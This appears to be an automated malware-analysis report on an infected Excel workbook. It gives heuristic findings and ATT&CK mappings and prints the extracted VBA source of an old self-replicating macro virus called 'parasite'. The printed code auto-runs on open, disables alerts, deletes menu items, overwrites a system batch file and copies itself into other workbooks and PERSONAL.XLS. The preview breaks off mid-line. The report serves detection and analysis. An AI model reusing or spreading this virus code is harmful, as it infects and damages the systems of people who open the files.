MALICIOUS
380
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The file is identified as malicious by ClamAV with the signature Xls.Trojan.Ksg-1. It contains an AutoOpen VBA macro that utilizes Shell() and CreateObject() calls, indicating an attempt to execute arbitrary code. The macro is obfuscated and designed as an auto-executing loader, strongly suggesting it downloads and executes a second-stage payload.
Heuristics 7
-
ClamAV: Xls.Trojan.Ksg-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Ksg-1
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 26871 bytes |
SHA-256: d949ef6044335fe09aba4da718e5cc6a9cf4405c63eba64585258ec283686581 |
|||
|
Detection
ClamAV:
Xls.Trojan.Ksg-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Foglio2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Foglio3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
' ----------------------------------------------------------------------------------------
' This is parasite excel macro
' (c) 1999 by ksg
' astigmatiZm virus group
' www.astigmatiZm.cjb.net
' rename this file to parasite.bas and import it in MS Excel Visual Basic Editor to activate
' ----------------------------------------------------------------------------------------
Sub AutoOpen()
Application.OnSheetActivate = "parasite"
Call Mail
End Sub
Sub parasite()
On Error Resume Next
vname = "parasite"
dwb = "PERSONAL.XLS"
dvp = Application.StartupPath & "\" & dwb
counter1 = 0
counter2 = 0
With Application
.ScreenUpdating = False
.DisplayAlerts = False
.EnableCancelKey = xlDisabled
End With
Set cb = CommandBars: Set crtl = Controls
cb("Tools").ctrl(10).Delete: cb("Tools").ctrl(12).Delete
cb("View").ctrl(3).Delete: cb("Window").ctrl(3).Delete
cb("Window").ctrl(4).Delete
Call Poly
Randomize
If Int((Rnd * 10) + 1) = 10 Then
Application.Caption = "Microsoft Parasite 2000"
Application.StatusBar = "You have unleashed the parasite"
Open "c:\windows\dosstart.bat" For Output Access Write As 1
Print #1, "@ECHO OFF"
Print #1, "ECHO ---------------------------------"
Print #1, "ECHO You have unleashed the parasite "
Print #1, "ECHO ---------------------------------"
Print #1, "ECHO (c) 2000 k s g [astigmatiZm] "
Print #1, "ECHO ---------------------------------"
Close 1
End If
If Month(Now) = 9 And Day(Now) = 10 Then Call hidetb
If Month(Now) = 9 And Day(Now) = 11 Then Call showtb
Application.VBE.ActiveVBProject.VBComponents.Item(vname).Export "C:\progra~1\parasite.sys"
If Dir(dvp) = dwb Then counter2 = 1
For x = 1 To ActiveWorkbook.VBProject.VBComponents.Count
If ActiveWorkbook.VBProject.VBComponents(x).Name = vname Then counter1 = 1
Next x
If counter1 = 0 Then
ActiveWorkbook.VBProject.VBComponents.Import "C:\progra~1\parasite.sys"
ActiveWorkbook.Save
End If
If counter2 = 0 Then
Workbooks.Add.SaveAs FileName:=dvp
ActiveWorkbook.VBProject.VBComponents.Import "C:\progra~1\parasite.sys"
ActiveWindow.Visible = False
Workbooks(dwb).Save
End If
End Sub
Sub hidetb()
On Error Resume Next
CommandBars("Edit").Enabled = False: CommandBars("Insert").Enabled = False
CommandBars("File").Enabled = False: CommandBars("Tools").Enabled = False
End Sub
Sub showtb()
On Error Resume Next
CommandBars("Edit").Enabled = True: CommandBars("Insert").Enabled = True
CommandBars("File").Enabled = True: CommandBars("Tools").Enabled = True
End Sub
Sub ViewVBCode()
MsgBox Chr(84) + Chr(104) + Chr(105) + Chr(115) + Chr(32) + Chr(118) + Chr(101) + Chr(114) + Chr(115) + Chr(105) + Chr(111) + Chr(110) + Chr(32) + Chr(111) + Chr(102) + Chr(32) + Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.